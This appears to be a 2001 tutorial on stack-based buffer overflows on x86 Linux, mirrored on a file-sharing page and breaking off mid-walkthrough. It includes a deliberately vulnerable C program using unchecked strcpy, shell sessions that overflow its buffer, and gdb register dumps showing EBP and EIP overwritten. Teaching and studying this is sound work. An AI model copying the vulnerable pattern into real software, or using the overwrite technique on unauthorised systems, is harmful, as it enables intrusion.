Exploiting Stack Based Buffer Overflows.txt

(21 KB) Pobierz 
               ァ+++++++++++++++++++++++++++++++++++++++++++++++ァ
              ]|[        [-=- SOLDIERX.COM Presents -=-]      ]|[
+++++++++++++++ァ+++_________________________________________+++ァ+++++++++++++++
 \\//////////////// Exploiting Stack Based Buffer Overflows \\\\\\\\\\\\\\\\//
  \\\\\\\\\\\\\\\\\_________________________________________/////////////////
   \\::::::::::::::::::::::::::::::::::by::::::::::::::::::::::::::::::::://
    \\xxxxxxxxxxxxxxxxxxxxxxァ-=-][- The Itch -][-=-ァxxxxxxxxxxxxxxxxxxxxx//
     \\::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::://
      \\=====----------------------MARCH 2001---------------------=====//
       \\                         SOLDIERX.COM                        //
        \\          NOBODY CAN STOP INFORMATION INSEMINATION         //
         ァ=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++=ァ

    **********************************************************************
    |  The author hereby grants permission to reproduce, redistribute,   |
    |  or include this file(s) in your file section, electronic or print |
    |  newletter, or any other form of transmission that you choose, as  |
    |  long as it is kept intact and whole, with no ommissions, delet-   |
    |  ions, or changes.  SOLDIERX.COM - http://www.soldierx.com         |
    |      E-mail - root@bse.die.ms, Website - http://bse.die.ms/        |
    **********************************************************************
By The Itch / BsE
---------------------------------------

Lately i encountered more and more articles explaining stack based
buffer overflows, and after reading some, i decided to learn too
how they work.

The stuff i explain in this article are stack based buffer overflows
on the x86 architectures. Ofcourse, a basic knowledge of C is required
and a minimum knowlegde of assembly language also.

I have learned exploitation of stack based buffer overflows from
the articles of Aleph1 and mixter, furthermore WildCoyote was always
willing to answer my questions. 

Requirements:
1. intel/x86 machine running a flavor of linux.
2. root on that machine, or enable core dumping (ulimit -c unlimited).
3. pico (or any other text editor).
4. gdb (a very handy debugger).

Best to begin with, are some basic examples in C.

<-------vuln1.c---------------------------
/* Example program
 * Its vulnerability is in the use of the strcpy() function
 *
 * Coded by The Itch / BsE
 * root@bse.die.ms
 * http://bse.die.ms
 */

#include <stdio.h>
#include <unistd.h>
#include <string.h>

int main(int argc, char *argv[])
{
	char buffer[30];
	if(argc < 2)
	{
		printf("strcpy() NOT executed....\n");
		printf("Syntax: %s <something>\n", argv[0]);
		exit(0);
	}
		
	strcpy(buffer, argv[1]);
	printf("buffer = %s\n", buffer);
	printf("strcpy() executed...\n");
	return 0;
}	

/* Remember, there is no cure for BsE */

<-------vuln1.c---------------------------

The function strcpy() does not check its boundaries, that means
that it doesnt check if argv[1] fits into buffer, and just keeps
on copying into buffer until it encounters a NULL string (\0).

Lets run the program.

[root@daveli whiz]# gcc vuln1.c -o vuln1 
[root@daveli whiz]# ./vuln1 1234567890 
buffer = 1234567890 
strcpy() executed...
[root@daveli whiz]# 

No problems yet, because 1234567890 easily fits into a 30 byte buffer.
(1234567890 = only 10 bytes).

The buffer works like this:

[#####################] [ebp] [eip]

[#####################] = the buffer(size)
[ebp]			= the stack frame pointer
[eip]			= the instruction pointer (the return address)

The Stack Pointer, also known as the ESP registers points to the top
of the stack (wich is dynamical). The bottom of the stack is always
located at a fixed address. The stack grows downwards. Later on i will
explain why the Stack Pointer is intresting for us.

The Stack Frame Pointer. The register EBP is used on intel CPU's to
store the Stack Frame Pointer (sometimes called the Base Pointer). 
The first thing a procedure needs to do when its called is saving the
Stack Frame Pointer. After that the Stack Pointer (ESP) will be copied
into the Stack Frame pointer (EBP) and it creates with those values
the new Stack Frame pointer (EBP). The Frame Pointer is used to store
the locations of the local varabiales used in that particular function.

The Instruction Pointer. The Register EIP, also known as the return 
address. As soon as the strcpy() function is called, it wil save
the Instruction Pointer(EIP) onto the stack. The saved EIP will
become the return address of the strcpy() function. The Instruction
Pointer points to the next instruction the processor should execute.
(If we can overwrite that one, it is possible to execute our own
code).

[note] Memory works in multiples of 4. In our example program we
define for char buffer[30]; (30 bytes) but, because memory works
in multiples of 4, the memory actually reservers 32 bytes for
char buffer[30];

But lets continue with our program, we defined to buffer 30 bytes,
so lets test it:

[root@daveli whiz]# ./vuln1 123456789012345678901234567890 
buffer = 123456789012345678901234567890 
strcpy() executed...
[root@daveli whiz]# 

Works perfect. But actually there are 32 bytes reservered for buffer,
so lets test it again.

[root@daveli whiz]# ./vuln1 12345678901234567890123456789012 
buffer = 12345678901234567890123456789012 
strcpy() executed...
[root@daveli whiz]#  

Look, thats still possible.

[root@daveli whiz]# ./vuln1 12345678901234567890123456789012AAAA
buffer = 12345678901234567890123456789012AAAA
strcpy() executed... 
Segmentation fault (core dumped)
[root@daveli whiz]#

Ok, that didnt work anymore. I used A because that is in hexadecimal
0x41. (You see 0x41 easier when you debug your program). And i used
4 A's because the memory works in multiples of 4.

Lets examine what exactly happend. According to our above theory, only
the Frame Pointer (EBP) is overwritten, and not yet the EIP register
(the return address, what we really want to overwrite).

[root@daveli whiz]# gdb ./vuln1 core 
GNU gdb 19991116 Copyright 1998 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you are 
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions. 
There is absolutely no warranty for GDB.  Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `./vuln1 12345678901234567890123456789012AAAA'.  
Program terminated with signal 11, Segmentation fault. 
Reading symbols from /lib/libc.so.6...done.  
Reading symbols from /lib/ld-linux.so.2...done.  
#0 0x40031902 in __libc_start_main (main=Cannot access memory at address 
0x41414149 ) at ../sysdeps/generic/libc-start.c:55 55 ..
sysdeps/generic/libc-start.c: No such file or directory.  
(gdb) info registers 
eax            0x0      0
ecx            0x40014000       1073823744
edx            0x0      0
ebx            0x400fa120       1074766112
esp            0xbffff9f4       0xbffff9f4
ebp            0x41414141       0x41414141
esi            0x40012eb0       1073819312
edi            0x400ea533       1074701619
eip            0x40031902       0x40031902
eflags         0x10246  66118
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x0      0
fs             0x2b     43
gs             0x2b     43
fctrl          0x0      0
fstat          0x0      0
ftag           0x0      0
fiseg          0x0      0
fioff          0x0      0
---Type <return> to continue, or q <return> to quit---
foseg          0x0      0
fooff          0x0      0
fop            0x0      0
(gdb)

Aha, you can clearly see the register EBP is overwritten with 0x41414141
Good, but what we really want is to get EIP overwritten, so that we
can execute our own code. Lets start our example program one more time,
but we add another 4 A's to the command line.

[root@daveli whiz]# ./vuln1 12345678901234567890123456789012AAAAAAAA
buffer = 12345678901234567890123456789012AAAAAAAA
strcpy() executed...
Segmentation fault (core dumped)

Lets start up gdb again.

[root@daveli whiz]# gdb ./vuln1 core
GNU gdb 19991116
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `./vuln1 12345678901234567890123456789012AAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0x41414141 in ?? ()
(gdb) info registers
eax            0x0      0
ecx            0x40014000       1073823744
edx            0x0      0
ebx            0x400fa120       1074766112
esp            0xbffff884       0xbffff884
ebp            0x41414141       0x41414141
esi            0x40012eb0       1073819312
edi            0x400ea533       1074701619
eip            0x41414141       0x41414141
eflags         0x10246  66118
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x2b     43
gs             0x2b     43
fctrl          0x0      0
fstat          0x0      0
ftag           0x0      0
fiseg          0x0      0
fioff          0x0      0
---T...

Plik z chomika:

Inne pliki z tego folderu:

Inne foldery tego chomika:

Zgłoś jeśli naruszono regulamin